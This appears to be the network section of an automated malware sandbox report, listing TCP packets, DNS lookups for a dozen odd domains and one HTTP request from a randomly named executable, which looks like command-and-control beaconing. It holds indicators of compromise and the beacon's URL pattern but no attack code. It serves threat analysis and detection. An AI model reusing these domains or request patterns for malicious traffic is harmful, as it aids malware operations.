                                                                                                      Oct 8, 2024 15:56:48.521857023 CEST80500083.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:56:48.522016048 CEST80500083.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:56:48.994993925 CEST80500083.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:56:48.996607065 CEST5000880192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:56:50.016171932 CEST5000880192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:56:50.021214962 CEST80500083.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:56:51.035414934 CEST5000980192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:56:51.040709019 CEST80500093.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:56:51.043927908 CEST5000980192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:56:51.051431894 CEST5000980192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:56:51.056462049 CEST80500093.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:56:51.500041008 CEST80500093.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:56:51.500595093 CEST80500093.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:56:51.500642061 CEST5000980192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:56:51.503405094 CEST5000980192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:56:51.508265018 CEST80500093.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:56:56.550755978 CEST5001080192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:56:56.555735111 CEST80500103.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:56:56.556504965 CEST5001080192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:56:56.568715096 CEST5001080192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:56:56.573709965 CEST80500103.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:56:57.023560047 CEST80500103.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:56:57.025799036 CEST5001080192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:56:58.080730915 CEST5001080192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:56:58.085767984 CEST80500103.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:56:59.098676920 CEST5001180192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:56:59.103609085 CEST80500113.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:56:59.103698015 CEST5001180192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:56:59.118426085 CEST5001180192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:56:59.123364925 CEST80500113.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:57:00.475156069 CEST80500113.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:57:00.480822086 CEST5001180192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:57:00.627752066 CEST5001180192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:57:00.633111954 CEST80500113.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:57:01.646778107 CEST5001280192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:57:01.652451992 CEST80500123.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:57:01.652555943 CEST5001280192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:57:01.773335934 CEST5001280192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:57:01.953879118 CEST80500123.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:57:01.953933954 CEST80500123.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:57:02.112838984 CEST80500123.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:57:02.113013983 CEST5001280192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:57:03.297759056 CEST5001280192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:57:03.302664995 CEST80500123.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:57:04.316759109 CEST5001380192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:57:04.322061062 CEST80500133.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:57:04.328747034 CEST5001380192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:57:04.336757898 CEST5001380192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:57:04.341917038 CEST80500133.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:57:04.970952034 CEST80500133.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:57:04.971108913 CEST80500133.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:57:04.971118927 CEST80500133.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:57:04.975728989 CEST5001380192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:57:04.975728989 CEST5001380192.168.2.113.33.130.190
                                                                                                      Oct 8, 2024 15:57:04.980786085 CEST80500133.33.130.190192.168.2.11
                                                                                                      Oct 8, 2024 15:57:10.027333975 CEST5001480192.168.2.1115.197.204.56
                                                                                                      Oct 8, 2024 15:57:10.032483101 CEST805001415.197.204.56192.168.2.11
                                                                                                      Oct 8, 2024 15:57:10.032584906 CEST5001480192.168.2.1115.197.204.56
                                                                                                      Oct 8, 2024 15:57:10.045954943 CEST5001480192.168.2.1115.197.204.56
                                                                                                      Oct 8, 2024 15:57:10.050890923 CEST805001415.197.204.56192.168.2.11
                                                                                                      Oct 8, 2024 15:57:10.494374990 CEST805001415.197.204.56192.168.2.11
                                                                                                      Oct 8, 2024 15:57:10.496831894 CEST5001480192.168.2.1115.197.204.56
                                                                                                      Oct 8, 2024 15:57:11.547454119 CEST5001480192.168.2.1115.197.204.56
                                                                                                      Oct 8, 2024 15:57:11.552668095 CEST805001415.197.204.56192.168.2.11
                                                                                                      Oct 8, 2024 15:57:12.567433119 CEST5001580192.168.2.1115.197.204.56
                                                                                                      Oct 8, 2024 15:57:12.573709011 CEST805001515.197.204.56192.168.2.11
                                                                                                      Oct 8, 2024 15:57:12.575510025 CEST5001580192.168.2.1115.197.204.56
                                                                                                      Oct 8, 2024 15:57:12.592758894 CEST5001580192.168.2.1115.197.204.56
                                                                                                      Oct 8, 2024 15:57:12.598896027 CEST805001515.197.204.56192.168.2.11
                                                                                                      Oct 8, 2024 15:57:13.032480001 CEST805001515.197.204.56192.168.2.11
                                                                                                      Oct 8, 2024 15:57:13.035315990 CEST5001580192.168.2.1115.197.204.56
                                                                                                      Oct 8, 2024 15:57:14.094306946 CEST5001580192.168.2.1115.197.204.56
                                                                                                      Oct 8, 2024 15:57:14.099657059 CEST805001515.197.204.56192.168.2.11
                                                                                                      Oct 8, 2024 15:57:15.113595009 CEST5001680192.168.2.1115.197.204.56
                                                                                                      Oct 8, 2024 15:57:15.118741035 CEST805001615.197.204.56192.168.2.11
                                                                                                      Oct 8, 2024 15:57:15.118822098 CEST5001680192.168.2.1115.197.204.56
                                                                                                      Oct 8, 2024 15:57:15.131545067 CEST5001680192.168.2.1115.197.204.56
                                                                                                      Oct 8, 2024 15:57:15.136861086 CEST805001615.197.204.56192.168.2.11
                                                                                                      Oct 8, 2024 15:57:15.136877060 CEST805001615.197.204.56192.168.2.11
                                                                                                      Oct 8, 2024 15:57:15.596184969 CEST805001615.197.204.56192.168.2.11
                                                                                                      Oct 8, 2024 15:57:15.596241951 CEST5001680192.168.2.1115.197.204.56
                                                                                                      Oct 8, 2024 15:57:16.641522884 CEST5001680192.168.2.1115.197.204.56
                                                                                                      Oct 8, 2024 15:57:16.646704912 CEST805001615.197.204.56192.168.2.11
                                                                                                      Oct 8, 2024 15:57:17.661418915 CEST5001780192.168.2.1115.197.204.56
                                                                                                      Oct 8, 2024 15:57:17.666690111 CEST805001715.197.204.56192.168.2.11
                                                                                                      Oct 8, 2024 15:57:17.666785002 CEST5001780192.168.2.1115.197.204.56
                                                                                                      Oct 8, 2024 15:57:17.676268101 CEST5001780192.168.2.1115.197.204.56
                                                                                                      Oct 8, 2024 15:57:17.681303978 CEST805001715.197.204.56192.168.2.11
                                                                                                      Oct 8, 2024 15:57:18.136419058 CEST805001715.197.204.56192.168.2.11
                                                                                                      Oct 8, 2024 15:57:18.136445045 CEST805001715.197.204.56192.168.2.11
                                                                                                      Oct 8, 2024 15:57:18.137011051 CEST5001780192.168.2.1115.197.204.56
                                                                                                      Oct 8, 2024 15:57:18.139914036 CEST5001780192.168.2.1115.197.204.56
                                                                                                      Oct 8, 2024 15:57:18.144831896 CEST805001715.197.204.56192.168.2.11
                                                                                                      Oct 8, 2024 15:57:23.190479994 CEST5001880192.168.2.11198.252.106.191
                                                                                                      Oct 8, 2024 15:57:23.195560932 CEST8050018198.252.106.191192.168.2.11
                                                                                                      Oct 8, 2024 15:57:23.195648909 CEST5001880192.168.2.11198.252.106.191
                                                                                                      Oct 8, 2024 15:57:23.207777023 CEST5001880192.168.2.11198.252.106.191
                                                                                                      Oct 8, 2024 15:57:23.213191032 CEST8050018198.252.106.191192.168.2.11
                                                                                                      Oct 8, 2024 15:57:23.791959047 CEST8050018198.252.106.191192.168.2.11
                                                                                                      Oct 8, 2024 15:57:23.793499947 CEST8050018198.252.106.191192.168.2.11
                                                                                                      Oct 8, 2024 15:57:23.793559074 CEST5001880192.168.2.11198.252.106.191
                                                                                                      Oct 8, 2024 15:57:24.719579935 CEST5001880192.168.2.11198.252.106.191
                                                                                                      Oct 8, 2024 15:57:25.738004923 CEST5001980192.168.2.11198.252.106.191
                                                                                                      Oct 8, 2024 15:57:25.752857924 CEST8050019198.252.106.191192.168.2.11
                                                                                                      Oct 8, 2024 15:57:25.752964020 CEST5001980192.168.2.11198.252.106.191
                                                                                                      Oct 8, 2024 15:57:25.764981031 CEST5001980192.168.2.11198.252.106.191
                                                                                                      Oct 8, 2024 15:57:25.769884109 CEST8050019198.252.106.191192.168.2.11
                                                                                                      Oct 8, 2024 15:57:26.354571104 CEST8050019198.252.106.191192.168.2.11
                                                                                                      Oct 8, 2024 15:57:26.355001926 CEST8050019198.252.106.191192.168.2.11
                                                                                                      Oct 8, 2024 15:57:26.356858969 CEST5001980192.168.2.11198.252.106.191
                                                                                                      Oct 8, 2024 15:57:27.281928062 CEST5001980192.168.2.11198.252.106.191
                                                                                                      Oct 8, 2024 15:57:28.302795887 CEST5002080192.168.2.11198.252.106.191
                                                                                                      Oct 8, 2024 15:57:28.307912111 CEST8050020198.252.106.191192.168.2.11
                                                                                                      Oct 8, 2024 15:57:28.310787916 CEST5002080192.168.2.11198.252.106.191
                                                                                                      Oct 8, 2024 15:57:28.322824001 CEST5002080192.168.2.11198.252.106.191
                                                                                                      Oct 8, 2024 15:57:28.327800989 CEST8050020198.252.106.191192.168.2.11
                                                                                                      Oct 8, 2024 15:57:28.327970028 CEST8050020198.252.106.191192.168.2.11
                                                                                                      Oct 8, 2024 15:57:28.948509932 CEST8050020198.252.106.191192.168.2.11
                                                                                                      Oct 8, 2024 15:57:28.949104071 CEST8050020198.252.106.191192.168.2.11
                                                                                                      Oct 8, 2024 15:57:28.949745893 CEST5002080192.168.2.11198.252.106.191
                                                                                                      Oct 8, 2024 15:57:29.828670979 CEST5002080192.168.2.11198.252.106.191
                                                                                                      Oct 8, 2024 15:57:30.847764969 CEST5002180192.168.2.11198.252.106.191
                                                                                                      Oct 8, 2024 15:57:30.852754116 CEST8050021198.252.106.191192.168.2.11
                                                                                                      Oct 8, 2024 15:57:30.852874041 CEST5002180192.168.2.11198.252.106.191
                                                                                                      Oct 8, 2024 15:57:30.863439083 CEST5002180192.168.2.11198.252.106.191
                                                                                                      Oct 8, 2024 15:57:30.868576050 CEST8050021198.252.106.191192.168.2.11
                                                                                                      Oct 8, 2024 15:57:31.436985970 CEST8050021198.252.106.191192.168.2.11
                                                                                                      Oct 8, 2024 15:57:31.437139988 CEST8050021198.252.106.191192.168.2.11
                                                                                                      Oct 8, 2024 15:57:31.437191010 CEST5002180192.168.2.11198.252.106.191
                                                                                                      Oct 8, 2024 15:57:31.440011024 CEST5002180192.168.2.11198.252.106.191
                                                                                                      Oct 8, 2024 15:57:31.444863081 CEST8050021198.252.106.191192.168.2.11
                                                                                                      Oct 8, 2024 15:57:37.144804001 CEST5002280192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:37.150087118 CEST805002243.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:37.150161028 CEST5002280192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:37.161554098 CEST5002280192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:37.166615963 CEST805002243.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:38.673484087 CEST5002280192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:38.771317959 CEST805002243.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:39.692303896 CEST5002380192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:39.698402882 CEST805002343.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:39.698483944 CEST5002380192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:39.714010954 CEST5002380192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:39.719018936 CEST805002343.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:41.219310045 CEST5002380192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:41.271228075 CEST805002343.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:42.240793943 CEST5002480192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:42.423808098 CEST805002443.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:42.423926115 CEST5002480192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:42.435674906 CEST5002480192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:42.440591097 CEST805002443.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:42.440685034 CEST805002443.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:43.938045979 CEST5002480192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:43.983292103 CEST805002443.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:44.960820913 CEST5002580192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:44.966051102 CEST805002543.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:44.966166973 CEST5002580192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:44.974014997 CEST5002580192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:57:44.980477095 CEST805002543.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:58.532809019 CEST805002243.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:57:58.533169985 CEST5002280192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:58:01.095470905 CEST805002343.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:58:01.096963882 CEST5002380192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:58:03.799887896 CEST805002443.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:58:03.799952984 CEST5002480192.168.2.1143.154.104.247
                                                                                                      Oct 8, 2024 15:58:06.365169048 CEST805002543.154.104.247192.168.2.11
                                                                                                      Oct 8, 2024 15:58:06.365309954 CEST5002580192.168.2.1143.154.104.247

                                                                                                      UDP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Oct 8, 2024 15:54:54.496506929 CEST5529353192.168.2.111.1.1.1
                                                                                                      Oct 8, 2024 15:54:54.524173975 CEST53552931.1.1.1192.168.2.11
                                                                                                      Oct 8, 2024 15:55:10.119239092 CEST5024453192.168.2.111.1.1.1
                                                                                                      Oct 8, 2024 15:55:10.559197903 CEST53502441.1.1.1192.168.2.11
                                                                                                      Oct 8, 2024 15:55:24.083488941 CEST5798953192.168.2.111.1.1.1
                                                                                                      Oct 8, 2024 15:55:24.258888006 CEST53579891.1.1.1192.168.2.11
                                                                                                      Oct 8, 2024 15:55:38.567131042 CEST5764153192.168.2.111.1.1.1
                                                                                                      Oct 8, 2024 15:55:38.983153105 CEST53576411.1.1.1192.168.2.11
                                                                                                      Oct 8, 2024 15:55:52.957801104 CEST5185253192.168.2.111.1.1.1
                                                                                                      Oct 8, 2024 15:55:53.033871889 CEST53518521.1.1.1192.168.2.11
                                                                                                      Oct 8, 2024 15:56:06.519968987 CEST5408353192.168.2.111.1.1.1
                                                                                                      Oct 8, 2024 15:56:06.914417028 CEST53540831.1.1.1192.168.2.11
                                                                                                      Oct 8, 2024 15:56:20.504518032 CEST6531653192.168.2.111.1.1.1
                                                                                                      Oct 8, 2024 15:56:21.358762980 CEST53653161.1.1.1192.168.2.11
                                                                                                      Oct 8, 2024 15:56:29.427205086 CEST5242053192.168.2.111.1.1.1
                                                                                                      Oct 8, 2024 15:56:29.470457077 CEST53524201.1.1.1192.168.2.11
                                                                                                      Oct 8, 2024 15:56:43.350013971 CEST5535053192.168.2.111.1.1.1
                                                                                                      Oct 8, 2024 15:56:43.365582943 CEST53553501.1.1.1192.168.2.11
                                                                                                      Oct 8, 2024 15:56:56.524756908 CEST5083653192.168.2.111.1.1.1
                                                                                                      Oct 8, 2024 15:56:56.547382116 CEST53508361.1.1.1192.168.2.11
                                                                                                      Oct 8, 2024 15:57:09.991146088 CEST5099653192.168.2.111.1.1.1
                                                                                                      Oct 8, 2024 15:57:10.024205923 CEST53509961.1.1.1192.168.2.11
                                                                                                      Oct 8, 2024 15:57:23.145077944 CEST5686853192.168.2.111.1.1.1
                                                                                                      Oct 8, 2024 15:57:23.187769890 CEST53568681.1.1.1192.168.2.11
                                                                                                      Oct 8, 2024 15:57:36.457571983 CEST5242053192.168.2.111.1.1.1
                                                                                                      Oct 8, 2024 15:57:37.138364077 CEST53524201.1.1.1192.168.2.11

                                                                                                      DNS Queries

                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Oct 8, 2024 15:54:54.496506929 CEST192.168.2.111.1.1.10x3d4dStandard query (0)www.whats-in-the-box.orgA (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:10.119239092 CEST192.168.2.111.1.1.10x88cStandard query (0)www.1183377.appA (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:24.083488941 CEST192.168.2.111.1.1.10xd7ebStandard query (0)www.52ywq.vipA (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:38.567131042 CEST192.168.2.111.1.1.10x2f8dStandard query (0)www.zenscape.topA (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:52.957801104 CEST192.168.2.111.1.1.10x7eaStandard query (0)www.asociacia.onlineA (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:56:06.519968987 CEST192.168.2.111.1.1.10x107bStandard query (0)www.93187.xyzA (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:56:20.504518032 CEST192.168.2.111.1.1.10xb85Standard query (0)www.insicilia.todayA (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:56:29.427205086 CEST192.168.2.111.1.1.10x61ecStandard query (0)www.tempatmudisini01.clickA (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:56:43.350013971 CEST192.168.2.111.1.1.10xb9d8Standard query (0)www.o731lh.vipA (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:56:56.524756908 CEST192.168.2.111.1.1.10xbd6cStandard query (0)www.consultarfacil.onlineA (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:57:09.991146088 CEST192.168.2.111.1.1.10x8b4bStandard query (0)www.broomeorchard.xyzA (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:57:23.145077944 CEST192.168.2.111.1.1.10x1a90Standard query (0)www.suarahati20.xyzA (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:57:36.457571983 CEST192.168.2.111.1.1.10xe13Standard query (0)www.nmh6.siteA (IP address)IN (0x0001)false

                                                                                                      DNS Answers

                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Oct 8, 2024 15:54:54.524173975 CEST1.1.1.1192.168.2.110x3d4dNo error (0)www.whats-in-the-box.orgwhats-in-the-box.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:54:54.524173975 CEST1.1.1.1192.168.2.110x3d4dNo error (0)whats-in-the-box.org3.33.130.190A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:54:54.524173975 CEST1.1.1.1192.168.2.110x3d4dNo error (0)whats-in-the-box.org15.197.148.33A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:10.559197903 CEST1.1.1.1192.168.2.110x88cNo error (0)www.1183377.appr83l7k.asiagoogleantiddoscdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:10.559197903 CEST1.1.1.1192.168.2.110x88cNo error (0)r83l7k.asiagoogleantiddoscdn.comhse6978h2.g.asiagoogleantiddoscdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:10.559197903 CEST1.1.1.1192.168.2.110x88cNo error (0)hse6978h2.g.asiagoogleantiddoscdn.com23.224.37.76A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:10.559197903 CEST1.1.1.1192.168.2.110x88cNo error (0)hse6978h2.g.asiagoogleantiddoscdn.com23.224.37.78A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:10.559197903 CEST1.1.1.1192.168.2.110x88cNo error (0)hse6978h2.g.asiagoogleantiddoscdn.com23.225.60.59A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:10.559197903 CEST1.1.1.1192.168.2.110x88cNo error (0)hse6978h2.g.asiagoogleantiddoscdn.com23.225.60.99A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:10.559197903 CEST1.1.1.1192.168.2.110x88cNo error (0)hse6978h2.g.asiagoogleantiddoscdn.com156.251.233.3A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:10.559197903 CEST1.1.1.1192.168.2.110x88cNo error (0)hse6978h2.g.asiagoogleantiddoscdn.com156.251.233.84A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:10.559197903 CEST1.1.1.1192.168.2.110x88cNo error (0)hse6978h2.g.asiagoogleantiddoscdn.com156.251.233.85A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:10.559197903 CEST1.1.1.1192.168.2.110x88cNo error (0)hse6978h2.g.asiagoogleantiddoscdn.com23.224.27.171A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:10.559197903 CEST1.1.1.1192.168.2.110x88cNo error (0)hse6978h2.g.asiagoogleantiddoscdn.com23.224.27.173A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:24.258888006 CEST1.1.1.1192.168.2.110xd7ebNo error (0)www.52ywq.vip2rqff6.zxy-cname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:24.258888006 CEST1.1.1.1192.168.2.110xd7ebNo error (0)2rqff6.zxy-cname.comxzwp.g.zxy-cname.comCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:24.258888006 CEST1.1.1.1192.168.2.110xd7ebNo error (0)xzwp.g.zxy-cname.com20.184.53.162A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:24.258888006 CEST1.1.1.1192.168.2.110xd7ebNo error (0)xzwp.g.zxy-cname.com52.187.43.40A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:24.258888006 CEST1.1.1.1192.168.2.110xd7ebNo error (0)xzwp.g.zxy-cname.com20.190.75.237A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:24.258888006 CEST1.1.1.1192.168.2.110xd7ebNo error (0)xzwp.g.zxy-cname.com52.230.116.182A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:24.258888006 CEST1.1.1.1192.168.2.110xd7ebNo error (0)xzwp.g.zxy-cname.com20.184.51.15A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:24.258888006 CEST1.1.1.1192.168.2.110xd7ebNo error (0)xzwp.g.zxy-cname.com52.187.42.58A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:38.983153105 CEST1.1.1.1192.168.2.110x2f8dNo error (0)www.zenscape.top199.192.21.169A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:53.033871889 CEST1.1.1.1192.168.2.110x7eaNo error (0)www.asociacia.onlineasociacia.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:55:53.033871889 CEST1.1.1.1192.168.2.110x7eaNo error (0)asociacia.online81.2.196.19A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:56:06.914417028 CEST1.1.1.1192.168.2.110x107bNo error (0)www.93187.xyz107.163.130.249A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:56:21.358762980 CEST1.1.1.1192.168.2.110xb85Name error (3)www.insicilia.todaynonenoneA (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:56:29.470457077 CEST1.1.1.1192.168.2.110x61ecNo error (0)www.tempatmudisini01.clicktempatmudisini01.clickCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:56:29.470457077 CEST1.1.1.1192.168.2.110x61ecNo error (0)tempatmudisini01.click103.21.221.4A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:56:43.365582943 CEST1.1.1.1192.168.2.110xb9d8No error (0)www.o731lh.vipo731lh.vipCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:56:43.365582943 CEST1.1.1.1192.168.2.110xb9d8No error (0)o731lh.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:56:43.365582943 CEST1.1.1.1192.168.2.110xb9d8No error (0)o731lh.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:56:56.547382116 CEST1.1.1.1192.168.2.110xbd6cNo error (0)www.consultarfacil.onlineconsultarfacil.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:56:56.547382116 CEST1.1.1.1192.168.2.110xbd6cNo error (0)consultarfacil.online3.33.130.190A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:56:56.547382116 CEST1.1.1.1192.168.2.110xbd6cNo error (0)consultarfacil.online15.197.148.33A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:57:10.024205923 CEST1.1.1.1192.168.2.110x8b4bNo error (0)www.broomeorchard.xyz15.197.204.56A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:57:10.024205923 CEST1.1.1.1192.168.2.110x8b4bNo error (0)www.broomeorchard.xyz3.33.243.145A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:57:23.187769890 CEST1.1.1.1192.168.2.110x1a90No error (0)www.suarahati20.xyzsuarahati20.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:57:23.187769890 CEST1.1.1.1192.168.2.110x1a90No error (0)suarahati20.xyz198.252.106.191A (IP address)IN (0x0001)false
                                                                                                      Oct 8, 2024 15:57:37.138364077 CEST1.1.1.1192.168.2.110xe13No error (0)www.nmh6.site43.154.104.247A (IP address)IN (0x0001)false

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • www.whats-in-the-box.org
                                                                                                      • www.1183377.app
                                                                                                      • www.52ywq.vip
                                                                                                      • www.zenscape.top
                                                                                                      • www.asociacia.online
                                                                                                      • www.93187.xyz
                                                                                                      • www.tempatmudisini01.click
                                                                                                      • www.o731lh.vip
                                                                                                      • www.consultarfacil.online
                                                                                                      • www.broomeorchard.xyz
                                                                                                      • www.suarahati20.xyz
                                                                                                      • www.nmh6.site

                                                                                                      HTTP Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.11499813.33.130.190803000C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 8, 2024 15:54:54.544260025 CEST468OUTGET /i7xp/?-L=kBMxZFRpAD6P&gP=1hYOXgym/+H9levAkr4ECV6rOYKZY3gLAuBEPSFmNBWW1UoBGm7krMakoIf2T8PCbakGk5cJYsK9Iz90f+By3ei+nF7KhZYXgTY0pVgzUu8kB5fl+xjkuOc= HTTP/1.1
                                                                                                      Host: www.whats-in-the-box.org
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                      Accept-Language: en-US
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
                                                                                                      Oct 8, 2024 15:54:55.057811022 CEST394INHTTP/1.1 200 OK
                                                                                                      Server: openresty
                                                                                                      Date: Tue, 08 Oct 2024 13:54:55 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 254
